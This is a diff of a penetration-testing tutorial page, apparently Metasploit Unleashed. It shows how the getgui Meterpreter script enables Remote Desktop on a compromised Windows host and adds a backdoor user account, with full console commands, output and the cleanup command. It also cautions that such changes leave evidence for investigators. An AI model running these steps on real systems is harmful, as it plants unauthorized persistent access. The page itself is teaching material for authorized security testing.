 Let’s look at another situation where Metasploit makes it very easy to backdoor the system using nothing more than built-in system tools.
-We will utilize Carlos Perez’s ‘getgui‘ script, which enables Remote Desktop and creates a user account for you to log into it with.
-Utilization of this script could not be easier.
+We will utilize Carlos Perez’s getgui script, which enables Remote Desktop and creates a user account for you to log into it with.
+Use of this script could not be easier.

-meterpreter > run getgui -h Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u -p Or: getgui -e OPTIONS: -e Enable RDP only. -f Forward RDP Connection. -h Help menu. -l The language switch Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN' -p The Password of the user meterpreter > run getgui -u hacker -p s3cr3t [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez email@example.com [*] Language detection started [*] Language detected: en_US [*] Setting user account for logon [*] Adding User: hacker with Password: s3cr3t [*] Adding User: hacker to local group '' [*] Adding User: hacker to local group '' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc meterpreter >
+meterpreter > run getgui -h [!]
+Meterpreter scripts are deprecated.
+Try post/windows/manage/enable_rdp. [!]
+Example: run post/windows/manage/enable_rdp OPTION=value [...]
+Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u -p Or: getgui -e OPTIONS: -e Enable RDP only. -f Forward RDP Connection. -h Help menu. -p The Password of the user to add. -u The Username of the user to add. meterpreter > run getgui -u loneferret -p password [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez email@example.com [*] Language detection started [*] Language detected: en_US [*] Setting user account for logon [*] Adding User: loneferret with Password: password [*] Adding User: loneferret to local group '' [*] Adding User: loneferret to local group '' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc meterpreter >

 Remember, these sorts of changes can be very powerful.
 However, use that power wisely, as all of these steps alter the systems in ways that can be used by investigators to track what sort of actions were taken on the system.
 The more changes that are made, the more evidence you leave behind.

-When you are done with the current system, you will want to run the cleanup script provided to removed the added account.
+When you are done with the current system, you will want to run the cleanup script provided to remove the added account.

 meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc [*] Running Command List ... [*] Running command execute -H -f cmd.exe -a "/c net user hacker /delete" Process 288 created. meterpreter >